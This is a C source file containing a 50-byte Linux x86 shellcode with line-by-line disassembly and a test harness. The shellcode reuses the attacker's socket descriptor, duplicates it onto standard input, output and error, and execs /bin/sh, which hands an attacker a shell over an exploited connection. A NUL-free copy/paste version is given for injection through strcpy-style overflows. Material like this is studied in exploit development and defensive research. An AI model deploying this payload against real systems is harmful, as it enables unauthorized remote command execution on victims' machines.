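/* Socket Re-use Combo for linux x86 systems by ZadYree -- 50 bytes
 * <zadyree@tuxfamily.org>
 *
 * Made using the sockfd trick + dup2(fd,0), dup2(fd,1), dup2(fd,2) +
 * execve /bin/sh
 *
 * Thanks: Charles Stevenson, ipv, 3LRVS research team
 *
 * Build:
 *   gcc -m32 -o socket_reuse socket_reuse.c -z execstack
 *
 * -m32 is required: the payload uses int 0x80 and 32-bit registers, and
 * byte 0x48 is `dec %eax` only in 32-bit mode (in long mode it is a REX
 * prefix and the payload breaks). -z execstack is needed because the
 * harness jumps straight into a plain byte array.
 *
 * Run this only in a throwaway VM: it hands an interactive /bin/sh to
 * whatever descriptor the payload selects.
 *
 * How the "sockfd trick" works: dup(2) returns the lowest free
 * descriptor, so (return value - 1) is the highest descriptor currently
 * open. The payload assumes that descriptor is the attacker's socket,
 * i.e. the target opened nothing else after accept()/connect(); if it
 * did, the shell lands on the wrong fd. The dup()'d descriptor is never
 * closed -- harmless, but visible in /proc/<pid>/fd.
 */
#include <stdio.h>
#include <string.h>

char shellcode[] =
    /* fd = dup(2) - 1  -> sockfd trick, see header */
    "\x6a\x02"                  // push   $0x2
    "\x5b"                      // pop    %ebx        dup()'s argument: fd 2
    "\x6a\x29"                  // push   $0x29       41 = sys_dup
    "\x58"                      // pop    %eax
    "\xcd\x80"                  // int    $0x80       eax = lowest free fd
    "\x48"                      // dec    %eax        eax = highest open fd
    "\x89\xc6"                  // mov    %eax,%esi   save it; eax is clobbered below

    /* dup2(fd,0); dup2(fd,1); dup2(fd,2) */
    "\x31\xc9"                  // xor    %ecx,%ecx   newfd counter = 0
    "\x56"                      // push   %esi
    "\x5b"                      // pop    %ebx        oldfd = sockfd
    // loop:
    "\x6a\x3f"                  // push   $0x3f       63 = sys_dup2; reloaded every
    "\x58"                      // pop    %eax        pass because int 0x80 overwrites eax
    "\xcd\x80"                  // int    $0x80
    "\x41"                      // inc    %ecx
    "\x80\xf9\x03"              // cmp    $0x3,%cl
    "\x75\xf5"                  // jne    loop        rel8 = -11, back to push $0x3f

    /* execve("/bin//sh", NULL, NULL) by ipv */
    "\x6a\x0b"                  // push   $0xb        11 = sys_execve
    "\x58"                      // pop    %eax
    "\x99"                      // cdq                edx = 0 -> envp = NULL
    "\x52"                      // push   %edx        string terminator
    "\x31\xf6"                  // xor    %esi,%esi   - extra NULL on the stack
    "\x56"                      // push   %esi        - keeps the arg area clean
    "\x68\x2f\x2f\x73\x68"      // push   $0x68732f2f "//sh"
    "\x68\x2f\x62\x69\x6e"      // push   $0x6e69622f "/bin"
    "\x89\xe3"                  // mov    %esp,%ebx   filename = "/bin//sh"
    "\x31\xc9"                  // xor    %ecx,%ecx   argv = NULL
    "\xcd\x80";                 // int    $0x80

/* The same 50 bytes packed for copy/paste. There is no NUL byte anywhere,
 * so the payload survives strcpy()-style copies:
 *
 * "\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6"
 * "\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80"
 * "\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6"
 * "\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
 * "\x89\xe3\x31\xc9\xcd\x80"
 */

/* Test harness: print the payload length, then jump into it.
 * Returns 0 only if the payload ever comes back, which it does not when
 * the execve succeeds (the process image is replaced by /bin/sh). */
int main(void)
{
    /* strlen() is a valid length check only because the payload contains
     * no NUL byte; %zu matches size_t. */
    printf("Shellcode length: %zu\n", strlen(shellcode));
    /* execve() discards the stdio buffers with the rest of the process
     * image, so flush now or the line above is lost whenever stdout is a
     * pipe or file (fully buffered). */
    fflush(stdout);

    void (*run)(void) = (void (*)(void))shellcode;
    run();
    return 0;
}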